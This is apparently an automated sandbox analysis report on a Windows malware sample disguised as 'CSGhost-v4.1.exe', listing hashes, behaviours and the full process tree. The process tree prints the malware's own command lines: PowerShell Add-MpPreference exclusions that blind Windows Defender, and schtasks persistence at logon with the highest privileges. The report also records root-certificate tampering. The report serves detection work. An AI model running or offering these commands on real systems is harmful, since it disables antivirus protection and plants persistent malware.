d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2

Analysis

max time kernel
144s
max time network
136s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
09/11/2024, 16:28 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CSGhost-v4.1.exe
Size

158KB
MD5

2dd7cacaab277d37dace276fc3c98f32
SHA1

7227f97f9539a7620ef4ff6687394bce9220d972
SHA256

2340f7976585cd113520b33eb51c6b57e37c6bad2fba29a48b8c7e8e784a2491
SHA512

df73194f1adeff94942ff01e4161a836b642d02a5da564a0b8388936b1a1c7e0018779e49cfef38e8523c032d31bf34dc0fce7fad3185a57d5a20a616eb46520
SSDEEP

3072:mSKJbzx0eTzNRvcF9mOQEUzJw4xE+vn84Tt4dVmfyu5ytLNoH:pWztTz709mVEUzvydVk5ytLN

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2328	powershell.exe
2788	powershell.exe
2784	powershell.exe
1100	powershell.exe
2200	powershell.exe
2584	powershell.exe
1892	powershell.exe
2556	powershell.exe
2152	powershell.exe
1940	powershell.exe
1784	powershell.exe
776	powershell.exe
2936	powershell.exe
1460	powershell.exe
2476	powershell.exe
2100	powershell.exe
1616	powershell.exe
2720	powershell.exe
2084	powershell.exe
1652	powershell.exe

Executes dropped EXE 12 IoCs

pid	Process
2776	CSGhost-v4.1.exe
2188	svchost.exe
2452	svchost64.exe
1632	svchost.exe
680	svchost64.exe
976	sihost64.exe
2460	svchost.exe
2976	svchost64.exe
2148	svchost.exe
1128	svchost64.exe
1632	svchost.exe
2508	svchost64.exe

Loads dropped DLL 12 IoCs

pid	Process
2128	CSGhost-v4.1.exe
2128	CSGhost-v4.1.exe
2536	cmd.exe
2452	svchost64.exe
2160	cmd.exe
680	svchost64.exe
976	sihost64.exe
988	cmd.exe
976	sihost64.exe
2708	cmd.exe
976	sihost64.exe
2460	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
18	raw.githubusercontent.com
23	raw.githubusercontent.com
9	raw.githubusercontent.com
10	raw.githubusercontent.com
13	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CSGhost-v4.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CSGhost-v4.1.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	svchost64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	svchost64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	svchost64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	svchost64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	svchost64.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2916	schtasks.exe
2736	schtasks.exe
2124	schtasks.exe
1112	schtasks.exe
1536	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2720	powershell.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe
2776	CSGhost-v4.1.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	2452	svchost64.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	680	svchost64.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	2976	svchost64.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	1128	svchost64.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	2508	svchost64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 2776	2128	CSGhost-v4.1.exe	29
PID 2128 wrote to memory of 2776	2128	CSGhost-v4.1.exe	29
PID 2128 wrote to memory of 2776	2128	CSGhost-v4.1.exe	29
PID 2128 wrote to memory of 2776	2128	CSGhost-v4.1.exe	29
PID 2128 wrote to memory of 2188	2128	CSGhost-v4.1.exe	30
PID 2128 wrote to memory of 2188	2128	CSGhost-v4.1.exe	30
PID 2128 wrote to memory of 2188	2128	CSGhost-v4.1.exe	30
PID 2128 wrote to memory of 2188	2128	CSGhost-v4.1.exe	30
PID 2188 wrote to memory of 2844	2188	svchost.exe	31
PID 2188 wrote to memory of 2844	2188	svchost.exe	31
PID 2188 wrote to memory of 2844	2188	svchost.exe	31
PID 2844 wrote to memory of 2720	2844	cmd.exe	33
PID 2844 wrote to memory of 2720	2844	cmd.exe	33
PID 2844 wrote to memory of 2720	2844	cmd.exe	33
PID 2844 wrote to memory of 2084	2844	cmd.exe	34
PID 2844 wrote to memory of 2084	2844	cmd.exe	34
PID 2844 wrote to memory of 2084	2844	cmd.exe	34
PID 2844 wrote to memory of 2584	2844	cmd.exe	35
PID 2844 wrote to memory of 2584	2844	cmd.exe	35
PID 2844 wrote to memory of 2584	2844	cmd.exe	35
PID 2844 wrote to memory of 1940	2844	cmd.exe	36
PID 2844 wrote to memory of 1940	2844	cmd.exe	36
PID 2844 wrote to memory of 1940	2844	cmd.exe	36
PID 2188 wrote to memory of 2536	2188	svchost.exe	37
PID 2188 wrote to memory of 2536	2188	svchost.exe	37
PID 2188 wrote to memory of 2536	2188	svchost.exe	37
PID 2536 wrote to memory of 2452	2536	cmd.exe	39
PID 2536 wrote to memory of 2452	2536	cmd.exe	39
PID 2536 wrote to memory of 2452	2536	cmd.exe	39
PID 2452 wrote to memory of 3040	2452	svchost64.exe	40
PID 2452 wrote to memory of 3040	2452	svchost64.exe	40
PID 2452 wrote to memory of 3040	2452	svchost64.exe	40
PID 3040 wrote to memory of 1112	3040	cmd.exe	42
PID 3040 wrote to memory of 1112	3040	cmd.exe	42
PID 3040 wrote to memory of 1112	3040	cmd.exe	42
PID 2452 wrote to memory of 1632	2452	svchost64.exe	43
PID 2452 wrote to memory of 1632	2452	svchost64.exe	43
PID 2452 wrote to memory of 1632	2452	svchost64.exe	43
PID 2452 wrote to memory of 1088	2452	svchost64.exe	44
PID 2452 wrote to memory of 1088	2452	svchost64.exe	44
PID 2452 wrote to memory of 1088	2452	svchost64.exe	44
PID 1632 wrote to memory of 2900	1632	svchost.exe	46
PID 1632 wrote to memory of 2900	1632	svchost.exe	46
PID 1632 wrote to memory of 2900	1632	svchost.exe	46
PID 1088 wrote to memory of 2904	1088	cmd.exe	47
PID 1088 wrote to memory of 2904	1088	cmd.exe	47
PID 1088 wrote to memory of 2904	1088	cmd.exe	47
PID 2900 wrote to memory of 2936	2900	cmd.exe	49
PID 2900 wrote to memory of 2936	2900	cmd.exe	49
PID 2900 wrote to memory of 2936	2900	cmd.exe	49
PID 2900 wrote to memory of 1892	2900	cmd.exe	50
PID 2900 wrote to memory of 1892	2900	cmd.exe	50
PID 2900 wrote to memory of 1892	2900	cmd.exe	50
PID 2900 wrote to memory of 1460	2900	cmd.exe	51
PID 2900 wrote to memory of 1460	2900	cmd.exe	51
PID 2900 wrote to memory of 1460	2900	cmd.exe	51
PID 2900 wrote to memory of 1784	2900	cmd.exe	52
PID 2900 wrote to memory of 1784	2900	cmd.exe	52
PID 2900 wrote to memory of 1784	2900	cmd.exe	52
PID 1632 wrote to memory of 2160	1632	svchost.exe	53
PID 1632 wrote to memory of 2160	1632	svchost.exe	53
PID 1632 wrote to memory of 2160	1632	svchost.exe	53
PID 2160 wrote to memory of 680	2160	cmd.exe	55
PID 2160 wrote to memory of 680	2160	cmd.exe	55

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe
"C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
  "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2776
- C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\system32\cmd.exe
    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1940
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2536
  - - C:\Users\Admin\AppData\Local\Temp\svchost64.exe
      C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2452
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3040
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1112
    - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1632
      - C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1784
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        6⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:680
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
        8⤵
        
        PID:280
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1536
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:976
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        9⤵
        Executes dropped EXE
        
        PID:2460
        
        C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        10⤵
        
        PID:1316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2100
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        10⤵
        Loads dropped DLL
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        11⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
        12⤵
        
        PID:2404
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
        13⤵
